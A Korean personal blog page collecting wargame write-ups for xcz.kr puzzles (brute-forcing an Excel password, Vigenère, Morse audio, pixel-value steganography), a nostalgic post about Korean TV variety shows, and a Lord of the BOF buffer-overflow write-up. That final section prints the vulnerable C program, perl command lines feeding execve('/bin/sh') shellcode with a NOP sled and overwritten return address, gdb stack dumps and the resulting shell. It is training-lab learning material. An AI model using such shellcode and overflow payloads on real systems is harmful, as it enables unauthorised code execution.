반응형
11번의 풀이입니다.



다운로드ㄱㄱ 제목이 풀이방법을 알려주네요..



bf.xls.
(bruteforce.xls)?




구글에 칩니다.
둘중에 하나만 쳐서 프로그램 다운받고 ㄱㄱ.
힌트도 필요없네예 하하
브루트포싱하고 나오는 값이 키값입니다.
레드햇아 제발 내말좀 들어다오 왜 서버가 설치가 안되겠니 더 이상 팀장형한테 물어볼수도 없고 이거ㅠㅠ


반응형

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 17  (0) 2013.11.28
xcz.kr Prob 14  (0) 2013.11.28
xcz.kr Prob 11  (3) 2013.11.28
xcz.kr Prob 10  (2) 2013.11.28
xcz.kr Prob 8  (0) 2013.11.28
xcz.kr Prob 7  (0) 2013.11.28
  1. 질문입니다.. 2016.09.25 16:36

    안녕하세요 xcz.kr 11번 문제 풀고있는데 힌트라도 주실수 있을까 하고 문의드립니다.. 작성자님 처럼 엑셀 패스워드 브루트포스 툴을 다운받고 해보고 그랫는데 문제가 시간이 굉장히 오래걸리고.. 전에도 어떤 문제는 ZIP파일 암호를 브루트포스로 알아내어 문제를 푸는 방식이였는데 이것도 툴들을 사용하다보면 저는 시간이 굉장히 오래걸리더라구요 영어 소문자, 대문자, 숫자, 특수문자 대부분 들어간다고 가정하다보니.. 그래서 질문드립니다. 어떤 툴?이나 방법으로 문제를 푸셨는지 알수있을까요?..

    • EverTokki 2016.09.28 05:19

      3년도 더 된 글이라 기억이 잘 안 날 뿐더러.. 제 기억으로는 그냥 브루트포싱기를 돌려놓았던 기억이 납니다. 도움이 되지 못해 죄송합니다. (_ _)

    • ㅎㅎ 2016.09.28 22:11

      아니에요! ㅎㅎ 제가 많이 찾아보지도 않고 댓글로 도움을 요청한 미숙함을 오히려 사과드리고 싶네요 방금 괜찮은 툴을 찾아서 문제 풀었습니다. 감사합니다~

반응형

10번 문제 풀이입니다.


암튼 들어가보면 얼린 모니터의 사진이 있어요.




예. 다운받아봅시다. 바탕화면에 말입니다.

그러고 열어보니.. 어? 저기 중간쯤에 뭐 이상한게 있네요.



파일에는 메모장이 진리이고, 사진에는 그림판이 진리요.
그림판으로 열고 확대를 한 후,



그림판에는 이렇게 색을 뽑아낼 수 있는 도구가 있죠. 
이 도구로 색을 하나 뽑습니다. (맨 앞에꺼부터 하나하나)



색 하나를 뽑고서 오른쪽 맨 위에 있는 '색 편집'을 누른 뒤 RGB 값을 확인하고 이것으로 키 값을 알아냅니다. (저 색깔이 다른 모든 픽셀을 다 해야 합니다)
아스키로 말이져..

음 근데 카페에서 써놨던 글에는 아스키값이 10진수가 아니었었다고 했는데 기억이 잘 안나는데 음 뭐 여러분들이 알아서 찾아 풀으실꺼라고 믿습니다(ㅋ)

반응형

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 14  (0) 2013.11.28
xcz.kr Prob 11  (3) 2013.11.28
xcz.kr Prob 10  (2) 2013.11.28
xcz.kr Prob 8  (0) 2013.11.28
xcz.kr Prob 7  (0) 2013.11.28
xcz.kr Prob 3  (2) 2013.11.28
  1. aa 2014.01.24 13:11

    아스키값이 10진수가 아니라는건 뭔소리지 ㅋㅋ

    • BlogIcon EverTokki 2014.01.27 02:39 신고

      저도 모르겠습니다ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ이거 막 예전에 대충 풀이쓴거라서 말이져..
      근데 아마 10진수가 아니었던 생각이 나는데 잘 모르겠네요 그냥 10진수일지도

반응형

이당시 풀이를 폰으로 써서 스샷이 빈약한것은 양해부탁드립니다ㅋㅋ



문제8입니다.



구글은 우리의 친구에요. 흔한단어를 찾아보세요 :) 

대충 감이 오실겁니다.



다운받아보니 cw(추측:common word의 줄임말) 폴더속에 이미지 5장이 있군요. 아래는 그 이미지들입니다.







구글하면 이미지 검색이죠.

구글이미지 검색으로 풀 수 있습니다~

반응형

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 11  (3) 2013.11.28
xcz.kr Prob 10  (2) 2013.11.28
xcz.kr Prob 8  (0) 2013.11.28
xcz.kr Prob 7  (0) 2013.11.28
xcz.kr Prob 3  (2) 2013.11.28
xcz.kr Prob 2  (0) 2013.11.28
반응형

7번문제입니다.




Do you know this file?
이 파일을 아니? 라고 하는거 보면 이번 목표는 이 파일을 여는거겠죠.





.eps 확장자네요. 
구글링합니다.



오. 첫번째 링크로 들어가봅시다.



"Eps 파일을 열려면, 어도비 일러스트레이터같은 일러스트레이션 소프트웨어가 있어야 합니다."
...넹?
계속 읽어봅시다.
"근데, eps파일을 꼭 열 필요는 없다는걸 알아두세요. 워드같은 텍스트 편집 프로그램으로 옮겨넣을 수 있거등요."
아하. 해봅시다.



워드를 열고 -> 삽입 -> 사진 -> what.eps 파일

이렇게 합니다.





코드입니다.
QR은 아닌것 같아요. 세 사각형이 없잖아요?
그럼 구글링을 해보죠.
이 뒤부터 스샷은 귀찮아서 못 찍..........

근데 저 위의 사진을 오른쪽클릭-> 그림으로 저장을 합니다.
그 후, 구글 이미지에서 구글링을 한 후 찍어서 키값을 알아냅니다.


반응형

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 11  (3) 2013.11.28
xcz.kr Prob 10  (2) 2013.11.28
xcz.kr Prob 8  (0) 2013.11.28
xcz.kr Prob 7  (0) 2013.11.28
xcz.kr Prob 3  (2) 2013.11.28
xcz.kr Prob 2  (0) 2013.11.28
반응형
3번의 크립토(암호학)문제입니다.



뭔소리죠
첫 문장인 "Serz EKW"를 구글에 쳐봅시다.



'SERZ EKW 가 뭐인가요?'



이 사이트를 계속 훑다보니 이런 질문이 나왔습니다.
답변자가 누구신지, 답변을 참 짖궂게 해주셨네요.
단서는? 제목입니다. 제목.



자 그럼 이번엔 저 제목의 "polyalphabetic cipher"을 구글에 쳐봅니다.
(노동의 흔적인 보라색 링크들..) 거의 다 비그네르(Vignere) 암호문이라고 되어있네요.



이번에는 비그네르를 검색하는 겁니다.
첫번째 링크로 들어가줍시다.



아까 그 암호문을 복+붙하고 ①(나는 암호의 키를 모릅니다. 게싱해주세여) 과 ②(확인)을 눌러주면 됩니다.
오래걸립니다. 인터넷이 느린게 아니에요.



조금 기다리다 보면 거의 해독된 메세지들이 나옵니다. 
키값을 게싱하다 보면 완전한 키값이 나오는데 그게 인증키입니다.


반응형

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 11  (3) 2013.11.28
xcz.kr Prob 10  (2) 2013.11.28
xcz.kr Prob 8  (0) 2013.11.28
xcz.kr Prob 7  (0) 2013.11.28
xcz.kr Prob 3  (2) 2013.11.28
xcz.kr Prob 2  (0) 2013.11.28
  1. BlogIcon leew 2014.04.18 01:09

    흐아 비제네르 이거 못풀게써요..
    Key해석을 어떻게해야할지...
    조언 구해 봅니다..

    • BlogIcon EverTokki 2014.04.22 04:55 신고

      안녕하세요 :) 키로 의심되는 문단은 찾으셨나요? 키 목록 훑다보면 눈에 띄는 단어들이 있으실꺼에요. P.S) 체크해보니 소문자인 키도 대문자로 입력해야 맞습니다

반응형
xcz.kr 2번입니다.



Listen carefully! 

우선 귀기울여 들어보라고 했으니 들어봅시다.





마우스 우클릭->동영상 저장



쨘! 모스.wav가 생성되었습니다. 
morse가 뭘까요?

<위키백과> 예술가 Samuel F. B. Morse가 1836년에 개발한 코드로써, 전신에 사용되었다. 전기를 조정해 전신을 받는 전자석쪽에 특정 문자열을 보낼 수 있었어야 했는데, 그때 개발된 코드이다. (http://en.wikipedia.org/wiki/Morse_code#Development_and_history)한국어쪽에는 정보가 없네요..ㅋ...슬프다
네. 그렇다면 모스부호를 읽어봐야겠죠?



골드웨이브를 엽니다
오른쪽 밑에 Spectogram이라고 써놓은곳 보이시나요(검은 부분) 거기서 오른쪽 클릭->spectogram을 누르면 모스부호가 훨씬 잘보입니다ㅋㅋ 물론 여기서는 저 큰창을 보시는게 훨씬 효율적입니다

글자들을 조합하면 키가 나옵니다.


반응형

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 11  (3) 2013.11.28
xcz.kr Prob 10  (2) 2013.11.28
xcz.kr Prob 8  (0) 2013.11.28
xcz.kr Prob 7  (0) 2013.11.28
xcz.kr Prob 3  (2) 2013.11.28
xcz.kr Prob 2  (0) 2013.11.28
반응형
해피선데이♥..


"1995년 2월 26일에 신설된 프로그램으로써, 대한민국의 지상파 방송국 KBS 2TV에서 매주 일요일 오후 4시 55분부터 오후 7시 55분까지 방송되는 버라이어티쇼 프로그램이다." <위키백과>



저는 여걸 5와 6를 열심히 봤던 기억이 나기 때문에.. (거기 게임들.. 쥐를잡자 쥐를잡자 찍찍찍과 디비디비딥이 기억나네요.. 한동안 정말 좋아했었는데..) 아무래도 꽤나 초반부터 보았나봅니다ㅋㅋ 아직도 게임이 기억나는거 보면.. 열혈팬이었죠ㅎㅎ 거의 매번 보았습니다!! 쥐를 잡자 쥐를 잡자 찍찍찍~♬

날아라 슛돌이도 제 또래들이 나오고 게다가 그당시에 축구도 좋아했던지라 한번 꼭 들어가보고 싶다! 했었죠ㅋㅋ

하이파이브도 흥미롭게 본 기억이 나고.. 농사?하는 거였던걸로 기억나는데 이게 맞는지.. 근데 오늘 쓰고 싶은 주제는 1박 2일에 대한거에요. "《1박 2일》은 2007년 8월 5일부터 대한민국 KBS 2TV에서 방송되는 버라이어티 쇼로, 리얼 야생 로드 버라이어티를 모토로 대한민국 각지를 돌아 다니면서 1박 2일 동안 다양한 체험을 하는 프로그램이다."<위키백과> 요즘 1박 2일은 시즌 3가 나온다는 얘기를 들었습니다.ㅠㅠ 그래도 1박2일이 종영은 안해서 좋은데.. 그야말로 처음 1박2일이 시작할때부터 보았던 저로써는 점점 존재감이 없어지는게 슬프네요.. 모로코에서, KBS World로 하는 프로그램은 1박2일이 가장 재미있어서 늘 아침 8시에 일어나 보았던 기억이 납니다ㅠ 상근이랑, MC몽, 이수근, 은지원, 강호동, 김C, 그리고 이승기.. 그때 동영상을 그때 보니 멤버들의 변한 모습이 신기하기도 하고 저도 참 그동안 많은 시간이 흘렀구나 느끼기도 하네요. 수많은 복불복과, 혹한기 캠프, 낙오, 벌칙, 퀴즈... 그동안 본 프로그램 중에서 가장 기억에 남습니다ㅋㅋ 언젠가 시청자투어도 꼭 참여하고 싶었는데, 그립네요ㅠㅠㅠㅠㅠ 나PD도 떠나고.. 하지만 새로 방영되는 시즌3도 잘 되길 바랍니다 :) 제 경우처럼 추억을 만들어주는 프로그램이 되었으면 좋겠어요! 그리고 남자의 자격은 아직도 하나요?ㅋㅋ 그거 합창이 정말 매력있고 가슴에 남는데.. 다시 보고싶네요

(아 감성돋아! ;ㅁ;)

그리고 잊어버리기엔 너무 아까운 예능들 몇개 더 적어볼께요ㅋㅋ


쟁반노래방: 쟁반노래방으로 노래 엄청 배웠습니다ㅋㅋㅋㅋㅋ 옛날노래같은거.. 정말 쟁반이 아파보였죠ㅠㅠ 꾸왕 소리나던데.. 숟가락뽑기가 인상적이었어요! 쨜랑쨜랑~ 그리고 찬스도 기억나네요ㅋㅋ

천하무적야구단: ㅋㅋㅋㅋㅋ이건 제가 '야동'이라는 단어를 배운 시초였습니다. 그땐 '야동'이 야구동영상이라는 말을 믿어버리고 다른뜻은 없는줄 할고 엄마한테 "야동이 뭐~게!"라고 했다가 엄마가 "야한 동영상?"이래서 "아냐! 야구동영상이야~" 라고 했던 기억이 납니다ㅋㅋㅋㅋㅋㅋㅋㅋㅋ 그당시엔 야한게 뭔뜻인지도 몰랐는데 말이죠..

상상플러스: 이게 우리말에 대한 거였나? 그런 프로그램이었죠. 정말 재미있게 봤는지라 이런 프로그램 더 있었으면 좋겠어요. "공부하세요!"하며 머리를 치는게 매력포인트였죠ㅋㅋ 그리고 탁재훈의 "나 나나나 나나나나나 나 쏴~!" 이런 프로그램 덕에 문법도 많이 배울 수 있었던것 같아요.

패밀리가 떴다: 이 프로그램은 많이 보지는 않았지만 한동안 열심히 보았었는데 가족같은 분위기랑 가끔은 티격태격하는것 떄문에 본 것 같아요ㅋㅋ 덤엔더머와.. 연예인들의 소소한? 모습도 볼 수 있었던것 같아서 좋았어요!!

가족오락관: 뭔가 모두 기억나지는 않지만 엄청 많은 종류들의 게임을 했던게 기억나네요ㅋㅋ 네이버에 찾아보니 1984년부터 진행된 방송이었네요! 저는 후반에 가서 본듯 하지만 즐겁게 봤던 기억이 나요. 멤버도 많고, 모르는 사람도 많았지만 소소한 게임들을 많이 했던 기억이 나네요~


지금은 런닝맨을 보고 있다죠.. 다른 예능들과는 또 다른 매력이 있는 것 같아요ㅋㅋ

반응형

'KOREAN > 뻘글' 카테고리의 다른 글

2014년!  (0) 2014.01.04
xcz.kr 풀이를 다 옮겨왔다!  (0) 2013.11.28
추억의 예능프로그램들..  (0) 2013.11.27
Phonebloks- A phone worth keeping (1)  (0) 2013.11.02
Phonebloks- A phone worth keeping  (0) 2013.09.16
크래커와 해커의 차이  (0) 2013.09.15
반응형

[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// here is changed!

if(strlen(argv[0]) != 77){ //argv[0], 즉 (프로그램명)입력값이 77보다 작으면 에러가 납니다.

                printf("argv[0] error\n");

                exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}


[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'//우선은 프로그램명 길이를 77로 맟추고 공격시도

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0:0x99580b6a 0x2f2f6852      0x2f686873  0x896e6962

0xbffffbb0:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'` //제대로 된 리턴어드레스를 넣고 공격.

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

하하♥

시험공부하겠다며 소셜미디어를 끊고..

엘오비를 하고있네요!!!!!!!!! 이게뭐야!!!!!!!!

NOTES:

argv[0]=절대경로

./는 //가 몇개있어도 상관없다

.이랑 orgi=5

77-5=72

페이로드는 전단계것을 씀

그런데 쉘코드가 저장되는 곳은 어디일까? 버퍼가 아닌데


반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

troll->vampire  (0) 2013.12.22
orge->troll  (0) 2013.12.21
darkelf->orge  (0) 2013.11.22
wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20

+ Recent posts